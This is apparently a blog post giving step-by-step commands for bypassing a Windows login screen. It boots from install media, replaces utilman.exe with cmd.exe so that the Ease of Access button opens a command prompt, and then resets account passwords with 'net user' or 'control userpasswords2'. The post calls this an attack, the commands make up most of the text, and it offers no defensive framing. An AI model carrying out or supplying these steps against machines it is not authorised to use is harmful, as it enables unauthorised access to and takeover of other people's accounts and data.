you need a windows disk or bootable usb drive to perform this attack.
connect the windows cd/dvd or pen drive and restart the system.
on the windows setup box click on next > repair your computer
then navigate to troubleshoot>advanced options>command prompt
X:\Sources>d:
D:\>dir (probably d drive is your c drive.)
navigate to windows\system32\
D:\Windows\System32>ren utilman.exe utilman_bak.exe
D:\Windows\System32>copy cmd.exe utilman.exe
cmd has now been replaced by utilman.exe
D:\Windows\System32>exit
poweroff or restart your pc.
now at the login screen if you click ease of access then command prompt will launch.
on the cmd prompt there are many ways to change users password.
type the following:
control userpasswords2
from there you can reset the passwords.
another way is:
net user <username> <password>
now time for revert the change. delete utilman.exe which is in behind cmd.exe
now when you up for renaming utilman_bak.exe then you will faced not permission alert.
https://mahimfiroj.blogspot.com/2022/01/abusing-windows-accessibility-features.html
the above link will tell you how to give or manage permission.
Avi
Comments
Post a Comment